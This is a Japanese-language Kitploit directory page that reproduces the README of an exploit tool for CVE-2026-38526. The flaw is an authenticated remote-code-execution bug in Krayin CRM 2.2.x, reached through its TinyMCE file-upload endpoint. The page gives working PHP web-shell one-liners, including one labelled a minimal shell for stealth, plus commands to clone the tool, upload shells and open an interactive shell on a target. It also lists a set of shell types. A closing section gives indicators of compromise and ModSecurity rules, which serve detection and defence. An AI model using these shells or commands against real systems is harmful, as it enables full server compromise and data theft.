Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526のKrayin CRM v2.2.x向けエクスプロイト - TinyMCEファイルアップロードバイパスを介した認証済みRCE。インタラクティブシェル、マルチタイプペイロード、自動シェル生成、および検証機能を備えています。作成者: Sudeepa Wanigarathna。許可されたテスト専用。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングシェルコード生成
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38526のKrayin CRM v2.2.x向けエクスプロイト - TinyMCEファイルアップロードバイパスを介した認証済みRCE。インタラクティブシェル、マルチタイプペイロード、自動シェル生成、および検証機能を備えています。作成者: Sudeepa Wanigarathna。許可されたテスト専用。

リポジトリを見る
381ヶ月前未レビュー

🔓 Krayin CRM v2.2.x - 認証されたリモートコード実行エクスプロイト

License: MIT CVE-2026-38526

⚠️ 許可されたセキュリティテストのみ - 無許可の使用は違法かつ非倫理的です。

📋 概要

このエクスプロイトツールは、Krayin CRM バージョン 2.2.x で発見された重大な認証済みリモートコード実行 (RCE) 脆弱性を示しています。この脆弱性は TinyMCE ファイルアップロード機能に存在し、認証済み管理者がサーバー上で任意の PHP コードをアップロードおよび実行することを可能にします。

プロパティ値
CVE IDCVE-2026-38526
影響を受けるソフトウェアKrayin CRM v2.2.x
脆弱性タイプ認証済みリモートコード実行 (RCE)
認証の必要性はい (管理者レベルのアクセス)
影響システム全体の侵害
CVSS スコア8.8 (高)

🚨 脆弱性の詳細

脆弱性は、TinyMCE ファイルアップロードエンドポイント (/admin/tinymce/upload) での不十分なファイルタイプ検証に起因します。認証済み管理者は以下が可能です:

  • 画像 MIME タイプで偽装された PHP ファイルをアップロードします。
  • ファイルは Web からアクセス可能な場所に保存されます。
  • 攻撃者はサーバー上で任意の PHP コードを実行できます。

影響を受けるバージョン

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • パッチリリース前のすべての 2.2.x バージョン

✨ 機能

  • 複数のシェルタイプ: 基本、高度、最小、ファイルマネージャー、カスタム
  • 対話型シェル: コマンド履歴を備えた完全なターミナル風インターフェース
  • ファイルアップロード: シェルを介した追加ファイルのアップロード
  • CSRF トークン抽出: CSRF 保護の自動処理
  • プロキシサポート: HTTP/HTTPS プロキシ経由のルーティング
  • 柔軟な出力形式: テキスト、JSON、またはサイレントモード
  • リトライロジック: 接続失敗時の自動リトライ
  • カスタムヘッダー: カスタム HTTP ヘッダーのサポート
  • 冗長モード: 詳細なデバッグ出力
  • SSL サポート: オプションの SSL 証明書検証

📦 インストール

必要条件

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

クイックインストール

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

必要条件ファイル (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 使い方

基本的なコマンド構文

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

必須パラメータ

一般的な使用例

root@kitploit:~
# Basic exploitation with generated shell
python3 exploit.py -t http://target.com -u [email protected] -p password

# Upload custom PHP shell file
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generate advanced shell with interactive mode
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generate shell file without exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Use with proxy for testing/debugging
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# JSON output for automation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Verbose mode with custom timeout
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Custom User-Agent and headers
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 シェルタイプ

  1. 基本シェル (basic) system() 関数によるシンプルなコマンド実行。

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. 高度なシェル (advanced) 豊富な機能を備えたシェル:

    • 複数のコマンド実行方式
    • 美しいターミナル風 Web インターフェース
    • コマンド履歴のサポート
    • 現在のユーザーとホスト名の表示
  3. 最小シェル (minimal) ステルス性のための最小フットプリント。

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. ファイルマネージャー (file_manager) 完全なファイル管理インターフェース:

    • ファイルのアップロード
    • ファイルの削除
    • ディレクトリの作成
    • ナビゲーション
    • ファイルパーミッションビューア
  5. カスタムシェル (custom) 独自の PHP シェルファイルを -f パラメータで使用します。

📝 出力形式

テキスト形式 (デフォルト)

対話的使用に適した人間が読める色付き出力。

JSON 形式 (-o json)

自動化や統合のための機械可読形式。

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

サイレント形式 (-q, --quiet)

エラー以外の出力を抑制。バッチ処理に便利。

⚙️ 高度なオプション

カスタムヘッダーの例

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 検出と防止

侵害の兆候 (IoC)

  • 監視すべきファイル:

    • public/storage/upload/ 内の異常な PHP ファイル
    • 二重拡張子を持つファイル (例: image.php.jpg)
    • 不審な名前の新しいファイル
  • 確認すべきログ:

    • /admin/tinymce/upload への POST リクエスト
    • 異常な管理者ログイン時間
    • 認証失敗の試行
  • システム指標:

    • 予期しないプロセスの実行
    • 新しい cron ジョブ
    • 変更されたシステムファイル

防止策

  • 即時対応:

    root@kitploit:~
    # Update to patched version
    composer update krayin/crm
    
    # Disable admin access temporarily
    # Remove unnecessary admin accounts
    # Change all admin passwords
    
  • ファイルアップロードの強化:

    root@kitploit:~
    // Validate file type by content, not just extension
    // Implement content security policy
    // Use Web Application Firewall (WAF)
    // Enable file upload scanning
    
  • アクセス制御:

    root@kitploit:~
    # Restrict admin IPs in .htaccess
    # Implement MFA for admin accounts
    # Regular admin audit
    # Session timeout policies
    
  • WAF ルール (ModSecurity):

    root@kitploit:~
    # Block suspicious file uploads
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Block web shells
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ 責任ある開示

この脆弱性は、責任あるセキュリティ研究を通じて発見されました。開示プロセスは以下の手順に従いました:

  • 発見: セキュリティ評価中に脆弱性を特定。
  • 検証: Krayin CRM 2.2.x での脆弱性を確認。
  • 報告: Krayin CRM 開発者に非公開で通知。
  • 連携: 修正の開発をチームと協力。
  • パッチ: 公式パッチリリースを待機中。
  • 開示: パッチ公開後に一般開示。

タイムライン

  • 発見: TBD
  • 報告: TBD
  • パッチ公開: TBD
  • 一般開示: TBD

📜 免責事項

root@kitploit:~
THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 トラブルシューティング

よくある問題

  • 問題: 認証に失敗する

    • 解決策: 資格情報を確認し、管理者ログインパスが /admin/login であることを確認
    • 確認: CSRF トークン抽出が正しく動作していることを確認
  • 問題: ファイルアップロードに失敗する

    • 解決策: ファイルのパーミッションを確認し、アップロードエンドポイントが存在することを確認
    • 確認: ターゲットが TinyMCE エディターを使用していることを確認
  • 問題: シェルがコマンドを実行しない

    • 解決策: php.ini で PHP 関数が無効化されていないことを確認
    • 確認: echo test のような簡単なコマンドでテスト
  • 問題: SSL 証明書エラー

    • 解決策: --verify-ssl フラグを使用するか、検証を無効にする
    • 注意: 自己署名証明書は適切な検証なしではエラーが発生します

デバッグモード

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://target.com -u admin -p pass -v

# With proxy (Burp Suite, etc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 貢献

貢献を歓迎します!以下の点を確認してください:

  • すべてのコードは適切にテストされていること。
  • ドキュメントが更新されていること。
  • 倫理ガイドラインに従っていること。
  • 脆弱性研究は責任を持って行われていること。

📚 参考資料

  • Krayin CRM 公式サイト
  • CVE-2026-38526
  • OWASP リモートコード実行
  • PHP セキュリティのベストプラクティス

⭐ サポート

このツールをセキュリティ研究に役立つと思われた場合、以下をご検討ください:

  • ⭐ リポジトリにスターを付ける
  • 🔔 更新情報をフォローする
  • 📢 他のセキュリティ研究者と共有する

セキュリティ研究のために ❤️ を込めて作成されました

覚えておいてください:大きな力には大きな責任が伴います。この知識を賢く使いましょう!

📊 クイックコマンドリファレンスカード

root@kitploit:~
# Quick reference
python3 exploit.py -t URL -u USER -p PASS [OPTIONS]

# Options:
#   -f FILE           Upload custom shell
#   --shell-type TYPE Basic|Advanced|Minimal|File_Manager|Custom
#   -i                Interactive mode
#   --proxy URL       HTTP proxy
#   -v                Verbose output
#   -o json           JSON output
#   --generate-only   Create shell without exploiting
#   --timeout SEC     Request timeout
#   --retry N         Retry count
#   --user-agent UA   Custom User-Agent
#   --header "K: V"   Custom headers
#   --verify-ssl      Verify SSL certificates
#   -q, --quiet       Suppress output

🔒 覚えておいてください:システムをテストする前に必ず書面による許可を得てください!

ツールをダウンロード
パラメータ説明
-t, --targetターゲット URL (例: http://192.168.1.100)
-u, --username管理者ユーザー名またはメール
-p, --password管理者パスワード
オプション説明デフォルト
--timeoutリクエストタイムアウト (秒)30
--retryリトライ回数3
--retry-delayリトライ間の遅延 (秒)2
--user-agentカスタム User-Agent 文字列デフォルトブラウザ UA
--headerカスタム HTTP ヘッダー (Key: Value)なし
--verify-sslSSL 証明書の検証False
--proxyHTTP/HTTPS プロキシ URLなし
-v, --verboseデバッグ出力を有効化False
-q, --quietすべての出力を抑制False